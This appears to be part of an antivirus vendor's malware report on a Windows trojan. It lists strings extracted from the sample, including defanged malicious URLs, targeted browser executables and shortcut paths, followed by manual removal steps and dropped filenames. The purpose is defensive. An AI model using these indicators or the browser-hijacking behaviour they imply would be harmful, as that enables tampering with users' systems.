WebBrowser
4%System%\shdocvw.oca
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
advapi32.dll
RegCreateKeyA
RegCloseKey
RegOpenKeyA
RegDeleteKeyA
shell32.dll
ShellExecuteA
psapi.dll
EnumWindows
psapi.dll
RegCreateKeyExA
RegOpenKeyExA
VBA6.DLL
hXXp:///
%Program Files%
@isual Studio\VB98\LINK.EXE.M
1.vbp
yyg.so
hXXp://96xx.net/tj2.html?1114
hXXp://wei.96xx.net/index.php?m=weixin&a=order&id=89
Chrome_WidgetWin
360se.exe
baidu.com
hao123.com
chrome.exe
sogouexplorer.exe
baidubrowser.exe
360chrome.exe
maxthon.exe
qqbrowser.exe
iexplore.exe
\Google Chrome.lnk
\Internet Explorer.lnk
wscript.shell
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Desktop
Wscript.shell
C:\Users\Public\Desktop\
C:\Users\Public\Desktop


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    taskkill.exe:2984
    kmokq.exe:1948
    auiay.exe:2924
    regsvr32.exe:1680
    hrl1.tmp:1736

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %System%\drivers\etc\hosts (898 bytes)
    %Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\»ÊÕߣ¸£°ÐÇÍõºÏ»÷[1].htm (827 bytes)
    %WinDir%\Temp\rhdkm.htm (826 bytes)
    %Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\Ò«»Ô´«Ææ[1].htm (4591 bytes)
    %Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\ÍõÕßÍøÂç[1].htm (984 bytes)
    %WinDir%\Temp\rbrkm.htm (2361 bytes)
    %Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\¹âÃ÷ºÏ»÷[2].rar (1338 bytes)
    %Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\ÍõÕßÍøÂç[1].htm (1678 bytes)
    %Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\ÍõÕßÍøÂç[2].htm (803 bytes)
    %Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\¹âÃ÷ºÏ»÷[1].rar (14456 bytes)
    %WinDir%\Temp\rkrkm.htm (11918 bytes)
    %Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\²ÆÉñ¢áÐÇ[1].rar (782 bytes)
    %Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\812Z098J\²ÆÉñ¢áÐÇ[1].rar (1338 bytes)
    %WinDir%\Temp\rqckm.htm (768 bytes)
    %WinDir%\Temp\rbbkm.htm (753 bytes)
    %WinDir%\Temp\rqrkm.htm (984 bytes)
    %System%\jarinet\QQExtrenal.exe (28 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\hrl1.tmp (37 bytes)
    %System%\eeeaea.exe (37 bytes)

  4. Restore the original content of the HOSTS file (%System%\drivers\etc\hosts):
    127.0.0.1 localhost
  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
